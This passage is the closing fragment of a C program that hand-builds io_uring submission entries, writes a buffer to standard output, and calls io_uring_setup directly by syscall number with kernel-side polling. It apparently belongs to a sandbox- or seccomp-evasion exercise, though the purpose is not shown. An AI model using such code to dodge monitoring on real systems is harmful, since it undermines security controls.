sqe[4].fd = 1;
sqe[4].addr = buff;
sqe[4].len = 0x100;


ktail = ring_ptr + 4;
io_uring_smp_store_release(ktail, 5);
__do_syscall2(425, 0x10, &params);

while (1) {};
return 0;
}